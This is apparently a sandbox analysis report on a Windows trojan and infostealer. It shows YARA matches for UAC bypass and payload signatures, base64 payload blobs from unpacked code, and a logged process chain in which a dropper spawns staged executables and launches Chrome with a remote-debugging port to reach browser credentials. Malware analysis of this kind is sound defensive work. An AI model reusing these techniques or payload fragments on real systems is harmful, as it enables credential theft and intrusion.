Source: 36.2.downloaded_file.exe.11fffa0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 39.2.explorer.exe.2dd0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.0.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 36.2.downloaded_file.exe.8d0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.powershell.exe.60324f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 28.2.powershell.exe.60b0328.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 41.2.explorer.exe.28a0000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: Process Memory Space: powershell.exe PID: 3284, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: file.exe	Static PE information: Section: ykpsajjh ZLIB complexity 0.994732980667772
Source: random[1].exe.0.dr	Static PE information: Section: ykpsajjh ZLIB complexity 0.994732980667772
Source: random[1].exe.12.dr	Static PE information: Section: ZLIB complexity 0.9976346237024222
Source: random[1].exe.12.dr	Static PE information: Section: nywettin ZLIB complexity 0.9946653980711044
Source: 60c1233683.exe.12.dr	Static PE information: Section: ZLIB complexity 0.9976346237024222
Source: 60c1233683.exe.12.dr	Static PE information: Section: nywettin ZLIB complexity 0.9946653980711044
Source: 50c9f14fb7.exe.12.dr	Static PE information: Section: ykpsajjh ZLIB complexity 0.994732980667772
Source: wTMEVe8[1].exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.000308902138158
Source: wTMEVe8[1].exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.000308902138158
Source: wTMEVe8.exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.000308902138158
Source: wTMEVe8.exe.12.dr	Static PE information: Section: .bss ZLIB complexity 1.000308902138158

Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, E32.cs	Cryptographic APIs: 'TransformBlock'
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, E32.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, E32.cs	Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'

Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, s67.cs	Base64 encoded string: 'H4sIAAAAAAAEADSbx3KEShZE/2W2LPBuifem8fBW2AYa7+HrH5qJUUSFUJuium7dzJMK6Z9//iNjq8L8/0u/aS75+lf1A9HNeKDHIPdzI+n9pG9SXAw6pGXliHf85saePL+/AP18PJYBmTjJ/RFDP2f/+5hxezU8O8KNXjklS2PoNdqOAkXLUmDYhdiMDaIUnKAPIM6/HXwqFKM8CQ6OIoCPIwpDBKDpIi1zkPiybCByhXgAaCLuAeKARDyC4FC5x2i624m7eo8T2q/ezqK3+fBXgpJ77GnbEb4VotnnlyM63y7zbLrX81ntNCAQUGt71c9hktTRxYpb/8wrqEtSqT52fJHtZRxv5WJ98qiBmxLLo6fGD77rDCyKpQd8NXU2Umwem001hj4J4C8OBEWS+ZkKdh9/vtAcee+3axntdLwODCC6gIAIesg8r0veUATssEj7E0V/AlyQwH4VOMukM0icfy7HUJu7ZZceFgPDQRkQizgptKUs1XTkZ5uvA3H1O6eRFP0koGQ0h3LAx/tZFcHttNDSw76yCVqopukgxqEWE82ae60XOzQqtXj6SKIF6lxCjfeug9PH4AZTREoLaIUWaA+IkpweAs2Ae6JYufRGmN3AaGDB4jtDgOQ90OpAmwJuCJqZFDpn7oK584jJl6ZAnPxa15az9bxOBZbkXgdNp4KjL/J5uvtBI6hh67pIk9ZuxH2w5/MpubdBs/KZvB3Ap94HNSCfq86LNDafxbsD/Oat8h7MNAiS9VLY1lFlEI2SKKXb7ZBzgbwSshh3jeCHVnDJdHx8lqmjJvCTeQt+AV3l6hABlNV3IPjUqkaRIsE887JroZNNsGM6kA/cnop7oOXZqxDg626Q7SCQhNo2FvFJOBoh/Bm5Opea2+JZYrROey9oAo02hAaGbaPMpd7yYGnpvF9gFOuyBvSPIsKX9DnnPewhwOkR0NDTKtazSlj8cgoJms1ahGaHzxra6I3vwQD2b7vF0mHPLUEx84GuochXt1phEjfAy8ldGfX5hmBuCIcJUzCOb6fXbjrqEeNUUB9gRHqUIiELqwGVlo9quGwpuYTjZLtP7+hcwPRMOX5/2soU/sxYrfr5kHT/vq9BL4/QA863UhVSXd9uUi2gBX+UHK3iP7Ou45uPIcuMWh9eetjOefel8Hi5p4/dCj5e4K68K4251wzCTmXJx/ffPW4HbAVI7ikFyhc/johi5qUDgKfAEq/37OWZu7o3cMhJK5/+6laBb2luUwm6byo6aR7zpRaONzKGfCIIt+lbbWorut5bcSlUJCWDEpGjZmWOguo9f/LjqqHW9Do4sjurB9HjqIsHDbhUawcGB74j+nlsVg7kR6eEqV8AU2sa+zivng3Pt44GhiNthgTMvg4J0VGsqQGnrSt/oLB+jcafnMA3wYKVoyWH/cMrAiqJZ7t1EJ9mzXmrV12TLUECNnEOrrfMHxIrhNmphT4iQuKnpS3VDZngVZXnqkBti1VI5a0EANFS14DBFaDSjG4ACFB6aRF2gknZ6ZRWCJ1pR4H1leej+WUXfIO3B3M8TlXYNRcS+6HnSsFFBk7ZU/HIjHH8lqIj2aKdlp4BooHSwg2olgXn7IhL7yoD6Mn5Es8NS/mGm5g4t2W07RK04SiBdp2+P7rsteoSA9IVX5QeTBVkKifYNAJ1Cn3f56ng7PpyDjNtjofu7Of+y4AjxjZK7yI9EvQZrVt6RFKQkUQhztm1pDHLGD+EQB5wgynV4KFRf5AGSSZyVYIXQKzQblqgIy4WlTRtaNHTgrTk3YOuUa04aTAPkfDoOfNg7dsHP9kW74Uly7iW7ytmxPFlYm/ozGd2+Kybn4GQtfhJGaH6sk7XZN/nUOp3hREnC81r/BhdrN8W+xh1zVKs6LTx0ETKQVzzgKUML/podrBI3wxKeaPfWaOJGsOgtTdw28c7ZJ+c8FiMGEOosHPEQaEDc3O/1m1+VxRhDDSfntRWovAmm4udqBU1mSvnteaLAh8uj+1X9/u+bbHWspSuz/aJ0wtYhQGZuGQ7T8fna0Mw+XVXzgtgntu/Q5kh37zpyb46sA9K8Je0tFIh8zYn476oqQXJbLdXoBbBgrJa5S1asLN3CDKA6k0fq7wj0iu/B21Tt6c/jn3GoA7PWNiQQh//67GuD5njr3wy4Si9kL/wgbdiZkXJ5QI++tK+AguI1VCRDyRXktMQuWGWzEnJRFdmMOGkZgrQxdtL+3B9j8+aq4QqOMRUYNKSXIlT8sr02Ci1lWD+BOF52T/NrkjH6ZRVE5JciB7PDxlk6yy8xVCYMR97ztrMSmLtaNrSjEp5eWA96V08QcF9SBC3vVvrdks/6QMWrH6J5c97lPzS8VSL+CPqhbabemuxF+Dw3NILSq3cx2GLWzGsLNgIOFhnQQ/bJN89plcXHfaLv5iVdPhwHXjVZtSY1rq3GoEgDqqQAEQNiQoIzM2VG3oGbx+uNuGrYrfmyQ3p+Gp9Jhs7afXlFVd9nMs4J6zVClbe+VGWZ6zah5we8Zm3bSbmNlIj9NtzZxnoHfbhL78KsDKjWsmFmFjDfzowTqGxmybAY3T0uUNKUp2i/lGdFQ7GFg5Xd2AUJRr4LUEnt+/66DW+bk5laVx6RKekqsgoF9rOco6p/+F9rttNSX5Ph205jViPgbAFlbT5MR1WYbe+skGV0/WQK8094JYQ+smOUUlC6vqK6VhzGdolBDdYaM5IsxC6i4c5qwLyl5o6qvwbr72YcOknmZaFD2O3QHR1S27FGpGsVKLT2w3pNA5A3+rAXEoE+V+HopaH5vakELZPxY7ucLWma1cAkZMECD87dQA9am9YVH5wEVWj1wT8od6EHpL047fAyhpEABXA13wDp3ddLb9ju0WL/thAH0EgVVZ/eIpkZnitGiZzbrbXkA0zwDZNZJjtH6JrYpin/POdB0o+h25Uv9RxaraabqS5Wgqws3P7jD86bAxx0lrvVzHJPHly5sTPq2naEuhswdNu9oECfa+
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, 8B6.cs	Base64 encoded string: 'H4sIAAAAAAAEAMsoKSkottLXzyzIzEvL18vM188qzs8DACTOYY8WAAAA', 'H4sIAAAAAAAACssoKSkottLXTyzI1Mss0CtO0k9Pzc8sAABsWDNKFwAAAA=='
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, 76n.cs	Base64 encoded string: 'ncVgg3aPvECMHz+bqCBPC0D3mNCs9VpkC7Q/fHMzlnUHKALx8zwmoYwMX6F35SpWj40eFjMD12mYDF5zfCd6VbmXClea3D++Fn6ZInjM2HS7mdiw7YspHSBXAstqE/0wBj5kVR2N1XkqL9zR8dIYXK4mvarcvAHUfJgHXK3usK88pEjL88vvRy6snmpdW7/XdBfiG41HKGPNKXtZ3oPyfnwgSOzTtHViWPQ/+2JYu0Wu5XyCwuncmVM/MLHt2XoLqCgyVGCzkK4RKwERLAhpCQ0wdPUE5bwXR+JpAdSlKJI='
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, 7YK.cs	Base64 encoded string: '/uMQxSqdDJ/VwGVuYeb3YiPwcZTPYVzzLQxAc4uLg5pyMIJpxcWldFJGqHrN/DVsh/6xryL6a8SeOPb5wrMugNyOpq454UjAkBRKCsUEBdupKVsIjppcZUuXJ5ro1HsqRdCVj5FiosZzcB590kCMtkKa0WckTz/scGaoEbZK958NsnOaS6XYvcDoHq4lZp2EQmO3dwvl/1JKoWJYVHwIvJN9HT1pUdMxfBhfuRR/csKCSs1G//s+3lHjinR61CaiQjCrX24K0YswRpsaQhXVL4O8CKnUwEqOqgQOyBSqszzJbAPTegl+dlVhU2wVURM+iAQkwypHLPs1kWAzxZ8cXBK+d8jaLFBj0Jq1PjhasphnSiN10lrn17hmTspu7m+jsDkYvstAYRiC+mP20oHw9anzO1qD1cwn8VzBF10/S+mtig+v/+evEjs/DXsXXRm2KuH1NsZivQvYLfPlkPX1wVKTeN51jRwzwH2RFXCiJLGd19ebLbjbqyDKdpf7chC8Kb9DkMX0/HaUmzF+UI1eU+479IF6LM9xMlARUHTRKFmJz5vSTJ/R6swFDjPYfXMPeMcKW1p2tvVQpw9NyLa2PBNt6rI6KtIV7mdBts0PnxeO2pfnZ6+ZDSQS29qoDxP/QwMIY3xnh7rn0Mv6Cm5pPZLpsyxJ8PaRBXDttg87kUTOJ8HLZ96PRHctvABbyc4/EpG1lE+psKeHUmvbGL92jbQY5d028ySwCcOJObV6Mc7HTBVHtXrQj3jevEWBjbw3NBAWGf7gruTDUgEP7O3JydNU2Yexzi7lKBZ4z7xS0L7WZbuanlI+K/bni2ieOzq96Mefaw1fUqRv0RcN93eVnhv5I9OP4l4ERfoyXJW6MKuiPZNpKkXNQKmZoWpvU1sPoNHseXs39yNrHTDIRDJn3DWoP0bcJJ57w1D2u5T2e6X2LysCwXA51ZTn18QlyGBglTgyw93psPHmaowIk+fgOHRc+1Y9YFbaACsLfIoc4H6AKDGx5qUTmOuKfpPLwTAS', 'WullN6Dv8VTcXOH7w6irYwXDq7efjf3kBqMW377Mm23kEsg6rPqQDTikXh4PbiLcbsbqBuEy9VFg3x97bixTyngrHl9WCruEqaIVRz47L1QrOCrkh7y3u2oyMtiauswS'
Source: 16.2.wTMEVe8.exe.436060.2.raw.unpack, 52Z.cs	Base64 encoded string: 'ICBfX18gICAgICAgICAgIF8gICAgICBfX18gICAgICAgICAgICAgXyAgICAgICAgXyAgIF9fXyAgICBfIF9fX19fIA0KIHwgICBcIF9fIF8gXyBffCB8X18gIC8gX198XyBfIF8gIF8gX198IHxfIF9fIF98IHwgfCBfIFwgIC9fXF8gICBffA0KIHwgfCkgLyBfYCB8ICdffCAvIC8gfCAoX198ICdffCB8fCAoXy08ICBfLyBfYCB8IHwgfCAgIC8gLyBfIFx8IHwgIA0KIHxfX18vXF9fLF98X3wgfF9cX1wgIFxfX198X3wgIFxfLCAvX18vXF9fXF9fLF98X3wgfF98X1wvXy8gXF9cX3wgIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHxfXy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIA=='

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@105/125@27/13

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C590300

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe

File created: C:\Program Files (x86)\jdownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\KCUXWMCC.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6896:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5744:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7E105FD4-6112-4FB9-A722-91E984087449}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4144:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{16875766-AD57-416F-8330-F0B6BCC3AFF1}
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D3378A42-4880-48C8-9826-A27CECC41889}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2252:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Program Files (x86)\jDownloader\config\qAbAtwEYfetkHedLuHYBzRERlhhmKB.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\62df1561360c976b6df54aa148d2c20df01577eee0d5b1c8f866533f16f01bca
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6884:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4960:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_03

Source: C:\Users\user\Documents\DBFIEHDHII.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat"

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\ProgramData\WindowsSystem1\WindosCPUsystem.exe	Process created: C:\Windows\explorer.exe

Source: C:\Windows\explorer.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"

Source: explorer.exe, 00000027.00000002.2965270172.00000000042F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2814235071.00000000041A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: explorer.exe, 00000027.00000002.2965270172.00000000042F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2814235071.00000000041A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: explorer.exe, 00000027.00000002.2965270172.00000000042F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2814235071.00000000041A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: file.exe, file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: explorer.exe, 00000027.00000002.2965270172.00000000042F0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000027.00000003.2814235071.00000000041A1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000003.1871264059.0000000005E55000.00000004.00000020.00020000.00000000.sdmp, 60c1233683.exe, 00000022.00000003.2752316946.00000000055BB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2116649444.0000000005F65000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2125845898.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 44%

Source: file.exe

String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

File read: C:\Users\user\AppData\Local\Temp\downloaded_file.exe

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=2148,i,11544534191024367753,17094532102307047588,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DBFIEHDHII.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\DBFIEHDHII.exe "C:\Users\user\Documents\DBFIEHDHII.exe"
Source: C:\Users\user\Documents\DBFIEHDHII.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe "C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe"
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe "C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe"
Source: C:\Users\user\AppData\Roaming\XXgM7ZsSvR.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1013238001\wTMEVe8.exe	Process created: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe "C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe"
Source: C:\Users\user\AppData\Roaming\wVBhC3KCkV.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\580b9vjIX7.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe "C:\Users\user\AppData\Local\Temp\1013239001\ntRoEwh.exe"
